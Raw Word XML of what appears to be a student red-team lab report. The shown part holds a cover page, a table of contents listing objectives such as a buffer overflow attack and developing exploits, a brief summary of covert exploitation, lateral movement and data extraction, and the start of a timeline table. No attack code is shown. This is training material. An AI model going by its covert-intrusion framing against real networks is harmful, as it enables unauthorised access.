              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17C0E57A" wp14:editId="06763FE0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5724525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2591435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1790700" cy="981075"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1792814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0" cy="981075"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1052C095" w14:textId="2A631F2F" w:rsidR="00FB6AB9" w:rsidRDefault="00FB6AB9">
                            <w:r>
                              <w:t>SUBMITTED TO:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="795D2BAE" w14:textId="7AF006CD" w:rsidR="00FB6AB9" w:rsidRPr="00FB6AB9" w:rsidRDefault="00FB6AB9">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00FB6AB9">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>PROF. SAAD INSHI</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="28F11290" w14:textId="4A182CB0" w:rsidR="00FB6AB9" w:rsidRDefault="00FB6AB9">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00FB6AB9">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">DATE: </w:t>
                            </w:r>
                            <w:r w:rsidR="004348C8">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>14</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00FB6AB9">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> AUGUST 2025</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="22C7D8EF" w14:textId="77777777" w:rsidR="00CC5CB8" w:rsidRDefault="00CC5CB8">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="30E1C572" w14:textId="77777777" w:rsidR="00CC5CB8" w:rsidRPr="00FB6AB9" w:rsidRDefault="00CC5CB8">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:b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C0E57A" id="Text Box 2" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:450.75pt;margin-top:204.05pt;width:141pt;height:77.25pt;z-index:2516654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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1052C095" w14:textId="2A631F2F" w:rsidR="00FB6AB9" w:rsidRDefault="00FB6AB9">
                      <w:r>
                        <w:t>SUBMITTED TO:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="795D2BAE" w14:textId="7AF006CD" w:rsidR="00FB6AB9" w:rsidRPr="00FB6AB9" w:rsidRDefault="00FB6AB9">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00FB6AB9">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>PROF. SAAD INSHI</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="28F11290" w14:textId="4A182CB0" w:rsidR="00FB6AB9" w:rsidRDefault="00FB6AB9">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00FB6AB9">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">DATE: </w:t>
                      </w:r>
                      <w:r w:rsidR="004348C8">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>14</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00FB6AB9">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> AUGUST 2025</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="22C7D8EF" w14:textId="77777777" w:rsidR="00CC5CB8" w:rsidRDefault="00CC5CB8">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="30E1C572" w14:textId="77777777" w:rsidR="00CC5CB8" w:rsidRPr="00FB6AB9" w:rsidRDefault="00CC5CB8">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09AA9431" wp14:editId="7565EF7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-617220</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2520950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A0A828F" w14:textId="7F51A664" w:rsidR="00472798" w:rsidRDefault="00472798">
                            <w:r>
                              <w:t>SUBMITTED BY:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="184065E5" w14:textId="3E4E849F" w:rsidR="00472798" w:rsidRPr="00472798" w:rsidRDefault="00472798">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00472798">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>AKASH NADACKANAL VINOD</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45F3FD00" w14:textId="27753A1F" w:rsidR="00472798" w:rsidRPr="00472798" w:rsidRDefault="00472798">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00472798">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>STUDENT ID: 041156265</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AA9431" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-48.6pt;margin-top:198.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" filled="f" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="1A0A828F" w14:textId="7F51A664" w:rsidR="00472798" w:rsidRDefault="00472798">
                      <w:r>
                        <w:t>SUBMITTED BY:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="184065E5" w14:textId="3E4E849F" w:rsidR="00472798" w:rsidRPr="00472798" w:rsidRDefault="00472798">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00472798">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>AKASH NADACKANAL VINOD</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="45F3FD00" w14:textId="27753A1F" w:rsidR="00472798" w:rsidRPr="00472798" w:rsidRDefault="00472798">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00472798">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>STUDENT ID: 041156265</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-801460047"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="70979079" w14:textId="67489F8D" w:rsidR="005B6670" w:rsidRDefault="005B6670">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="37B10B92" w14:textId="010F06EA" w:rsidR="003B05DC" w:rsidRDefault="005B667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206031372" w:history="1">
            <w:r w:rsidR="003B05DC" w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EXECUTIVE SUMMARY</w:t>
            </w:r>
            <w:r w:rsidR="003B05DC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003B05DC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003B05DC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031372 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003B05DC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003B05DC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003B05DC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B05DC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E15BCBA" w14:textId="7A88DCAC" w:rsidR="003B05DC" w:rsidRDefault="003B05DC">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc206031373" w:history="1">
            <w:r w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TIMELINE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031373 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42F5F97F" w14:textId="1B6B33BE" w:rsidR="003B05DC" w:rsidRDefault="003B05DC">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc206031374" w:history="1">
            <w:r w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ATTACKS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031374 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71715360" w14:textId="4F4F3D15" w:rsidR="003B05DC" w:rsidRDefault="003B05DC">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc206031375" w:history="1">
            <w:r w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OBJECTIVE 1: TRAINING GROUND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031375 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23988CB4" w14:textId="1B892CEB" w:rsidR="003B05DC" w:rsidRDefault="003B05DC">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc206031376" w:history="1">
            <w:r w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OBJECTIVE 2: EXPAND FOOTHOLD THROUGH BUFFER OVERFLOW ATTACK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031376 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E5A8E90" w14:textId="53388535" w:rsidR="003B05DC" w:rsidRDefault="003B05DC">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc206031377" w:history="1">
            <w:r w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OBJECTIVE 3: DEVELOPING OUR OWN EXPLOITS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031377 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="631BF47D" w14:textId="544616E8" w:rsidR="003B05DC" w:rsidRDefault="003B05DC">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc206031378" w:history="1">
            <w:r w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OBJECTIVE 4: WELCOME TO THE ENVIRONMENT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031378 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="427F58DE" w14:textId="627E4742" w:rsidR="003B05DC" w:rsidRDefault="003B05DC">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc206031379" w:history="1">
            <w:r w:rsidRPr="004B6996">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CONCLUSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc206031379 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="018E78C2" w14:textId="2A812759" w:rsidR="005B6670" w:rsidRDefault="005B6670">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3626C3DC" w14:textId="6D50EEB3" w:rsidR="005B6670" w:rsidRDefault="005B6670">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="231BDFCD" w14:textId="7F657BE8" w:rsidR="0010684D" w:rsidRDefault="00F71963" w:rsidP="0010684D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc206031372"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6450DA76" w14:textId="6BFFDE87" w:rsidR="00142C64" w:rsidRDefault="00F735CC" w:rsidP="0010684D">
      <w:r w:rsidRPr="00F735CC">
        <w:t>This exercise simulated a realistic targeted attack on a corporate network with limited perimeter defenses.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F735CC">
        <w:t>The Red Team identified and exploited vulnerabilities, created custom payloads, moved laterally within the network, and extracted sensitive data across four objectives.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F735CC">
        <w:t>All activities were carried out covertly, preserving stealth and operational integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56241B08" w14:textId="2ADC52EF" w:rsidR="00464344" w:rsidRDefault="00142C64" w:rsidP="0081014A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc206031373"/>
      <w:r>
        <w:t>TIMELINE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1263"/>
        <w:gridCol w:w="5962"/>
        <w:gridCol w:w="2125"/>
      </w:tblGrid>
      <w:tr w:rsidR="00464344" w14:paraId="44AC48CB" w14:textId="77777777" w:rsidTr="001F3F1A">
        <w:trPr>
          <w:trHeight w:val="435"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="798FB800" w14:textId="0454B289" w:rsidR="00464344" w:rsidRPr="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00464344">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1992C15A" w14:textId="2CAD7333" w:rsidR="00464344" w:rsidRPr="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00464344">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2125" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E105C28" w14:textId="7133F034" w:rsidR="00464344" w:rsidRPr="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00464344">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00464344" w14:paraId="2AEBFC07" w14:textId="77777777" w:rsidTr="00464344">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4530B506" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20715A8E" w14:textId="2111DBF9" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E4867BB" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344"/>
          <w:p w14:paraId="74989B52" w14:textId="1D8B910D" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:r>
              <w:t>Initial Foothold via Web Exploitation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37ABC603" w14:textId="3D1C3DA4" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2125" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20095515" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="4EA72E" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53D8456B" w14:textId="628B9613" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
